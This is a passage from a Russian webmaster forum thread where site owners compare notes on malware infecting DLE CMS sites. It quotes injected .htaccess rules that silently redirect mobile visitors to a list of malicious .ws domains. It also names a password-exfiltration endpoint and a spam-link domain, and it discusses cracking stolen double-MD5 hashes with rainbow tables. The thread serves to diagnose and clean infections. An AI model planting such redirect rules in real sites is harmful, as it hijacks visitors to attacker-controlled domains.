Вирус на сайте cms dle

siv1987
На сайте с 02.04.2009
Offline
427
#381

fxtotal, отписал в ПМ.

K5
На сайте с 21.07.2010
Offline
209
#382
WebMasterArtem:
Советую всем проверить свои сайты на наличие новой опасной штуки. Видимо созданной всё тем же злодеем, так как домен снова заканчивается на 00xff.net. Я уже радовался, что всё закончилось и думал - 'О, Чудо!". Но нет! Теперь ВО ВСЕХ новостях на сайте в самом низу появилась надпись "Скачать по прямой ссылке" ведущая на http://yandex.narod.ru.00xff.net/load.php?name=kakaya-libo-igra-ili-chto-to-eshe... Теперь придётся чистить БД.

И да. На сайте всего один пользователь и ни одной аватарки.

покажи урл...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
Master_globus
На сайте с 15.09.2006
Offline
113
#383
Korew:
Подскажите, как он мог туда попасть и что он делает. Этот код был на двух сайтах, один 9.5, другой - 9.7

Такой же код обнаружил и на версии 9.8. (Лицензия)

Уязвимость во всех версиях движка. Взломщик крадет пароли и отсылает их на ip

178.211.33.74/get_api.php?pid=2&

Работаю только с diafan.CMS 4.4.0 (http://cms.diafan.ru/cms576/)
B
На сайте с 07.05.2011
Offline
18
#384
Master_globus:
Взломщик крадет пароли и отсылает их на ip

Там же хеши md5

nop
K5
На сайте с 21.07.2010
Offline
209
#385
badu:
Там же хеши md5

может он сравнивает с базой известных...

B
На сайте с 07.05.2011
Offline
18
#386

Последние вести с фронтов.

Теперь еще изменяют файл .htaccess

RewriteCond %{QUERY_STRING} (^|&)noredirect=true(&|$)

RewriteRule ^ - [CO=mredir:0:%{HTTP_HOST},S]

RewriteCond %{HTTP:x-wap-profile} !^$ [OR]

RewriteCond %{HTTP:Profile} !^$

RewriteCond %{HTTP_HOST} !^m\.

RewriteCond %{HTTP:Cookie} !\smredir=0(;|$)

RewriteRule ^ http://$host/ [R,L]

В $host вставляется случайным образом выбранный домен из массива:

$domains = array('statuses.ws', 'live-internet.ws', 'googlecount.ws', 'livecountall.ws', 'googleinternet.ws', 'yacounter.ws', 'getinternet.ws', 'yandex-google.ws', 'ya-googl.ws', 'ya-analytics.ws', 'yadirect.ws');

Проверяйте свои сайты.

Master_globus
На сайте с 15.09.2006
Offline
113
#387
badu:
Там же хеши md5

А что мешает потом расшифровать?

B
На сайте с 07.05.2011
Offline
18
#388
Master_globus:
А что мешает потом расшифровать?

Там двойной md5 - рашифровка займет перебором очень большое время.

Милованов Ю.С
На сайте с 24.01.2008
Offline
196
#389
badu:
Там двойной md5 - рашифровка займет перебором очень большое время.

Радужные таблицы.

Сервис для таких операций(обратите внимание на огромный селект с вариантами хэшей).

Подпись))
IS
На сайте с 14.03.2013
Offline
0
#390

Дыры на сайте искать надо. Без закрытия дыр вся работа по поиску/удалению шеллов, вирусов итп будет сведена к нулю. Кого взломали, тем первым делом следуе смотреть конфиги и изменения в файлах, позволяющих выполнять серверные скрипты. Доры пишут туда. Потом вешают шеллы.

Кому интересно, могу поверхностно посмотреть сайт на уязвимости.

http://insafety.org

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий